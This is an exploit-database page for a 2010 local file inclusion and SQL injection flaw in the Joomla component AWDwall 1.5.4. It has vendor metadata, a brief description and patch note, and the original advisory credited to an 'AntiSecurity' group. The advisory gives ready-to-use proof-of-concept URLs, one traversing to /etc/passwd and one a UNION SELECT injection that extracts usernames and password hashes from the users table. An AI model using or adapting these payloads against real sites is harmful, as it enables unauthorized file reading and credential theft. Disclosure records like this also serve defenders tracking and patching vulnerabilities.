header-logo
Suggest Exploit
vendor:
AWDwall-Joomla
by:
AntiSecurity
8,8
CVSS
HIGH
Local File Inclusion & SQL Injection
89, 79
CWE
Product Name: AWDwall-Joomla
Affected Version From: 1.5.4
Affected Version To: 1.5.4
Patch Exists: Yes
Related CWE: N/A
CPE: a:awdsolution:awdwall
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Joomla Component AWDwall-Joomla LFI & SQLi [cbuser] Vulnerability

A vulnerability in the Joomla Component AWDwall-Joomla allows an attacker to perform a Local File Inclusion (LFI) and a SQL Injection (SQLi) attack. The vulnerability exists in the com_awdwall version 1.5.4, which is vulnerable to an LFI attack when the ‘controller’ parameter is manipulated. Additionally, the ‘cbuser’ parameter is vulnerable to a SQLi attack when the ‘view’ parameter is set to ‘awdwall’ and the ‘Itemid’ parameter is set to ‘1’.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of the software.
Source

Exploit-DB raw data:

=========================================================================================================


  [o] Joomla Component AWDwall-Joomla LFI & SQLi [cbuser] Vulnerability
 
       Software : com_awdwall version 1.5.4
       Vendor   : http://www.awdsolution.com/
       Author   : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
       Contact  : public[at]antisecurity[dot]org
       Home     : http://antisecurity.org/


=========================================================================================================


  [o] Exploit

       http://localhost/[path]/index.php?option=com_awdwall&controller=[LFI]
       http://localhost/[path]/index.php?option=com_awdwall&view=awdwall&Itemid=1&cbuser=1[SQL]


  [o] PoC

       http://localhost/index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00
       http://localhost/[path]/index.php?option=com_awdwall&view=awdwall&Itemid=1&cbuser=-1+union+select+1,2,3,4,5,6,group_concat(username,0x3a,password),8,9,10,11,12+from+jos_users--


=========================================================================================================


  [o] Greetz

       Angela Zhang stardustmemory aJe martfella pizzyroot Genex
       H312Y yooogy mousekill }^-^{ noname matthews kaka11 wishnusakti
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke


=========================================================================================================


  [o] April 08 2010 - GMT +07:00 Jakarta, Indonesia